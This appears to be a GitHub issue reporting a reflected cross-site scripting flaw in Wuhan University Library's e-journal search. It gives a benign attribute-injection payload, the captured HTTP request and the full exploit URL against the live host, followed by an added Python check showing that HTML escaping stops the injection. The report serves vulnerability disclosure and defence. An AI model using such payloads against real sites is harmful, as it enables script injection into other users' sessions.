Ex libris_xss vulnerability #1

Open
zhao1231 opened this issue Feb 9, 2022 · 0 comments

zhao1231 commented Feb 9, 2022

1. We can search Wuhan University Library on Google and click
2. Then we click the E-journals of Resources
3. We click the search, then we can jump to a new page
4. Enter the payload in the search box: `12345" onmousemove="console.log(123)`
   Click the search box, then move the mouse over the search box; we can see the log in the console
5. Here is the data packet from Burp Suite:
```
GET /cgi-bin/ej.cgi?s=12345%22+onmousemove%3D%22console.log%28123%29&x=16&y=12&typ=0&lang=0 HTTP/1.1
Host: sfx.lib.whu.edu.cn
User-Agent: R0VrgaJmaBRV
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```

The full URL of this vulnerability is:
http://sfx.lib.whu.edu.cn/cgi-bin/ej.cgi?s=12345%22+onmousemove%3D%22console.log%28123%29&x=16&y=12&typ=0&lang=0
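
An added example, not part of the original report and not the application's code: it decodes the `s` parameter from the reported URL, renders it into a search box with and without HTML attribute encoding, and uses a parser to list the attributes that result. The `<input>` template is an assumption, since the report does not show the page's markup.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# URL as given in the report.
REPORTED_URL = ("http://sfx.lib.whu.edu.cn/cgi-bin/ej.cgi?s=12345%22+onmousemove"
                "%3D%22console.log%28123%29&x=16&y=12&typ=0&lang=0")
# Assumed template: the report only says the search term is echoed back into
# the search box; the real markup is not shown.
TEMPLATE = '<input type="text" name="s" value="{}">'

def search_term(url):
    """Decode the `s` query parameter the way a CGI library would."""
    return parse_qs(urlsplit(url).query)["s"][0]

def render_vulnerable(term):
    """Echo the term into the attribute with no encoding."""
    return TEMPLATE.format(term)

def render_escaped(term):
    """Encode &, <, >, " and ' so the term cannot close the attribute."""
    return TEMPLATE.format(escape(term, quote=True))

class _InputAttrs(HTMLParser):
    def __init__(self):
        super().__init__()
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.attrs = dict(attrs)

def input_attributes(html):
    """Return the attributes an HTML parser sees on the <input> element."""
    parser = _InputAttrs()
    parser.feed(html)
    parser.close()
    return parser.attrs

def injected_attributes(html, expected=("type", "name", "value")):
    """Names of attributes that the template itself did not define."""
    return sorted(set(input_attributes(html)) - set(expected))

if __name__ == "__main__":
    term = search_term(REPORTED_URL)
    print("unencoded:", injected_attributes(render_vulnerable(term)))
    print("encoded:  ", injected_attributes(render_escaped(term)))
```

The same `injected_attributes` check can serve as a regression test for any template that echoes request parameters into attribute values.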
